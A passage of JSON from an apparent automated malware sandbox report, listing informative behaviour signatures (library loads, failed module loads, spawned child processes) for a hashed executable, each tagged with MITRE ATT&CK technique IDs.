"category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005920)\n \"4822004.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006044)\n \"4822004.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006044)\n \"4822004.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006044)\n \"4822004.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006044)\n \"26224.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005968)\n \"26224.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005968)\n \"26224.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005968)\n \"26224.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005968)\n \"226242.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005996)\n \"226242.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005996)\n \"226242.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005996)\n \"226242.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005996)\n \"484648.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006016)\n \"484648.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006016)\n \"484648.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006016)\n \"484648.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006016)\n \"20484.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003884)\n \"20484.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003884)\n \"20484.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003884)\n \"20484.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003884)\n \"806288.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004216)\n \"806288.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004216)\n \"806288.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004216)\n \"806288.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004216)\n \"hrrrr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006088)\n \"hrrrr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006088)\n \"hrrrr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006088)\n \"hrrrr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006088)\n \"vvvtjhp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006124)\n \"vvvtjhp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006124)\n \"vvvtjhp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006124)\n \"vvvtjhp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006124)\n \"lpljbv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004328)\n \"lpljbv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004328)\n \"lpljbv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004328)\n \"lpljbv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004328)\n \"rjldjr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002288)\n \"rjldjr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002288)\n \"rjldjr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002288)\n \"rjldjr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002288)\n \"ljlpvrx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006072)\n \"ljlpvrx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006072)\n \"ljlpvrx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006072)\n \"ljlpvrx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006072)\n \"2046660.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003748)\n \"2046660.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003748)\n \"2046660.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003748)\n \"2046660.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003748)\n \"jtjnrb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004464)\n \"jtjnrb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004464)\n \"jtjnrb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004464)\n \"jtjnrb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004464)\n \"nxlhfx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002804)\n \"nxlhfx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002804)\n \"nxlhfx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002804)\n \"nxlhfx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002804)\n \"pddnp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002380)\n \"pddnp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002380)\n \"pddnp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002380)\n \"pddnp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002380)\n \"60202.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004244)\n \"60202.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004244)\n \"60202.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004244)\n \"60202.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004244)\n \"24826.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002412)\n \"24826.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002412)\n \"24826.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002412)\n \"24826.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002412)\n \"hpdphl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003272)\n \"hpdphl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003272)\n \"hpdphl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003272)\n \"hpdphl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003272)\n \"vfdxfvl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003620)\n \"vfdxfvl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003620)\n \"vfdxfvl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003620)\n \"vfdxfvl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003620)\n \"4022682.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002736)\n \"4022682.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002736)\n \"4022682.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002736)\n \"4022682.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002736)\n \"6244848.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004072)\n \"6244848.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004072)\n \"6244848.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004072)\n \"6244848.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004072)\n \"rfbfjv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000564)\n \"rfbfjv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000564)\n \"rfbfjv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000564)\n \"rfbfjv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000564)\n \"bjvtfxj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004228)\n \"bjvtfxj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004228)\n \"bjvtfxj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004228)\n \"bjvtfxj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004228)\n \"4622600.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002796)\n \"4622600.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002796)\n \"4622600.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002796)\n \"4622600.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002796)\n \"08622.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002744)\n \"08622.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002744)\n \"08622.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002744)\n \"08622.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002744)\n \"ftpltv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003236)\n \"ftpltv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003236)\n \"ftpltv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003236)\n \"ftpltv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003236)\n \"bvrxv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003180)\n \"bvrxv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003180)\n \"bvrxv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003180)\n \"bvrxv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003180)\n \"tjbjhtr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003156)\n \"tjbjhtr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003156)\n \"tjbjhtr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003156)\n \"tjbjhtr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003156)\n \"fxbfvbf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004112)\n \"fxbfvbf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004112)\n \"fxbfvbf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004112)\n \"fxbfvbf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004112)\n \"ltbfnb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003952)\n \"ltbfnb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003952)\n \"ltbfnb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003952)\n \"ltbfnb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003952)\n \"626080.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003920)\n \"626080.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003920)\n \"626080.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003920)\n \"626080.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003920)\n \"dlbjrj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002524)\n \"dlbjrj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002524)\n \"dlbjrj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002524)\n \"dlbjrj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002524)\n \"dvxnn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004236)\n \"dvxnn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004236)\n \"dvxnn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004236)\n \"dvxnn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004236)\n \"nndlvj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003600)\n \"nndlvj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003600)\n \"nndlvj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003600)\n \"nndlvj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003600)\n \"hltjhx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001424)\n \"hltjhx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001424)\n \"hltjhx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001424)\n \"hltjhx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001424)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"4822004.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"26224.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"226242.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"8402624.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"484648.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"4262848.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"20484.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"806288.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"hrrrr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"vvvtjhp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"fvbll.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"lpljbv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"rjldjr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"ljlpvrx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"bfbfxx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"2046660.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"40484.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"jtjnrb.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"pvtnp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"nxlhfx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"pddnp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"tplfhb.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"60202.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000\n \"6260866.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CE0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"4822004.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4822004.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"26224.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"26224.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"226242.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"226242.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"484648.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"484648.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"20484.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"20484.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"806288.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"806288.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"hrrrr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"hrrrr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vvvtjhp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vvvtjhp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"lpljbv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lpljbv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rjldjr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rjldjr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ljlpvrx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ljlpvrx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"2046660.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"2046660.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jtjnrb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jtjnrb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nxlhfx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nxlhfx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"pddnp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"pddnp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"60202.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"60202.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"24826.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"24826.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"hpdphl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"hpdphl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vfdxfvl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vfdxfvl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4022682.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4022682.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"6244848.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6244848.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rfbfjv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rfbfjv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"bjvtfxj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"bjvtfxj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4622600.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4622600.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"08622.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"08622.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ftpltv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ftpltv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"bvrxv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"bvrxv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"tjbjhtr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"tjbjhtr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fxbfvbf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fxbfvbf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ltbfnb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ltbfnb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"626080.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"626080.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dlbjrj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dlbjrj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dvxnn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dvxnn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nndlvj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nndlvj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"hltjhx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"hltjhx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"4822004.exe\" (UID: 00000000-00006044)\n Spawned process \"26224.exe\" (UID: 00000000-00005968)\n Spawned process \"226242.exe\" (UID: 00000000-00005996)\n Spawned process \"8402624.exe\" (UID: 00000000-00005928)\n Spawned process \"484648.exe\" (UID: 00000000-00006016)\n Spawned process \"4262848.exe\" (UID: 00000000-00005936)\n Spawned process \"20484.exe\" (UID: 00000000-00003884)\n Spawned process \"806288.exe\" (UID: 00000000-00004216)\n Spawned process \"hrrrr.exe\" (UID: 00000000-00006088)\n Spawned process \"vvvtjhp.exe\" (UID: 00000000-00006124)\n Spawned process \"fvbll.exe\" (UID: 00000000-00003980)\n Spawned process \"lpljbv.exe\" (UID: 00000000-00004328)\n Spawned process \"rjldjr.exe\" (UID: 00000000-00002288)\n Spawned process \"ljlpvrx.exe\" (UID: 00000000-00006072)\n Spawned process \"bfbfxx.exe\" (UID: 00000000-00003812)\n Spawned process \"2046660.exe\" (UID: 00000000-00003748)\n Spawned process \"40484.exe\" (UID: 00000000-00001660)\n Spawned process \"jtjnrb.exe\" (UID: 00000000-00004464)\n Spawned process \"pvtnp.exe\" (UID: 00000000-00004252)\n Spawned process \"nxlhfx.exe\" (UID: 00000000-00002804)\n Spawned process \"pddnp.exe\" (UID: 00000000-00002380)\n Spawned process \"tplfhb.exe\" (UID: 00000000-00004280)\n Spawned process \"60202.exe\" (UID: 00000000-00004244)\n Spawned process \"6260866.exe\" (UID: 00000000-00004508)\n Spawned process \"6686484.exe\" (UID: 00000000-00003440)", "origin": "Monitored Target", "attck_id": 